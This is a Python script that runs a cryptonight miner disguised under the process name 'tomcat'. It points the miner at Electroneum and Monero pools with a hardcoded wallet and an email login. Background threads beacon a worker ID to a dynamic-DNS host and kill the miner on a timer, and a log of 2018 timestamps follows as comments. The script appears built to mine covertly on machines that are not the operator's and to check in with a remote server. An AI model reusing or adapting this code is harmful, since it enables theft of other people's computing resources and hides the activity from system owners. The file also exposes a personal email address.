import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:07.580043
#2018-02-17 16:53:01.516079
#2018-02-17 18:41:06.110489
#2018-02-17 20:29:01.715005
#2018-02-17 22:15:07.468160
#2018-02-17 23:59:05.706955
#2018-02-18 01:50:06.268237
#2018-02-18 03:38:01.800139
#2018-02-18 05:24:05.319113
#2018-02-18 07:17:02.102164
#2018-02-18 09:04:06.450791
#2018-02-18 10:51:07.524623
#2018-02-18 12:37:07.318361
#2018-02-18 14:23:07.566086
#2018-02-18 16:14:04.139776
#2018-02-18 18:02:06.995147
#2018-02-18 19:49:03.566262
#2018-02-18 21:36:05.630398
#2018-02-18 23:24:05.571906
#2018-02-19 01:10:06.072111
#2018-02-19 02:55:08.589831
#2018-02-19 04:42:04.644031
#2018-02-19 06:26:01.825124
#2018-02-19 08:16:02.178147
#2018-02-19 10:05:11.340736
#2018-02-19 11:54:02.159804
#2018-02-19 13:42:06.862511
#2018-02-19 15:32:08.084380
#2018-02-19 17:20:09.074072
#2018-02-19 19:09:06.113364
#2018-02-19 20:56:07.144158
#2018-02-19 22:44:06.895659
#2018-02-20 00:28:07.472293
#2018-02-20 02:16:07.223105
#2018-02-20 04:08:06.088109
#2018-02-20 05:51:05.337084
#2018-02-20 07:37:04.274127
#2018-02-20 09:21:07.744039
#2018-02-20 11:05:05.345390
#2018-02-20 12:52:09.188225
#2018-02-20 14:38:01.399835
#2018-02-20 16:22:06.475373
#2018-02-20 18:10:04.926140
#2018-02-20 20:02:08.984862
#2018-02-20 21:50:03.122272
#2018-02-20 23:32:03.817218
#2018-02-21 01:17:04.094010
#2018-02-21 03:03:06.952350
#2018-02-21 04:50:03.839532
#2018-02-21 06:39:06.297893
#2018-02-21 08:24:06.903752
#2018-02-21 10:11:01.577856
#2018-02-21 11:58:10.196755
#2018-02-21 13:48:04.187452
#2018-02-21 15:31:01.841758
#2018-02-21 17:20:09.747511
#2018-02-21 19:07:09.110578
#2018-02-21 20:55:10.106862
#2018-02-21 22:43:05.738440
#2018-02-22 00:32:08.086542
#2018-02-22 02:21:01.881555
#2018-02-22 04:07:07.800740
#2018-02-22 05:52:01.735600
#2018-02-22 07:37:05.543883
#2018-02-22 09:25:01.661920
#2018-02-22 11:11:03.697386
#2018-02-22 12:56:06.744345
#2018-02-22 14:43:07.048593
#2018-02-22 16:27:04.790954
#2018-02-22 18:13:01.431580
#2018-02-22 20:02:04.270394
#2018-02-22 21:52:04.722371
#2018-02-22 23:38:21.949217
#2018-02-23 01:27:04.262191
#2018-02-23 03:13:07.037494
#2018-02-23 05:00:04.442145
#2018-02-23 06:44:07.799548
#2018-02-23 08:36:07.717682
#2018-02-23 10:51:01.750406
#2018-02-23 12:48:08.312562
#2018-02-23 14:33:06.637878
#2018-02-23 16:24:07.164883
#2018-02-23 18:10:10.267668
#2018-02-23 19:54:05.647390
#2018-02-23 21:39:05.072511
#2018-02-23 23:31:06.416196
#2018-02-24 01:21:05.958961
#2018-02-24 03:13:04.264290
#2018-02-24 04:58:04.096337
#2018-02-24 06:48:02.177478
#2018-02-24 08:39:01.532814
#2018-02-24 10:23:04.999608
#2018-02-24 12:18:06.413346
#2018-02-24 14:11:07.488000
#2018-02-24 15:58:06.742112
#2018-02-24 17:49:06.512545
#2018-02-24 19:37:05.977599
#2018-02-24 21:24:05.762058
#2018-02-25 00:04:07.818203
#2018-02-25 04:23:02.179661
#2018-02-25 07:56:01.440014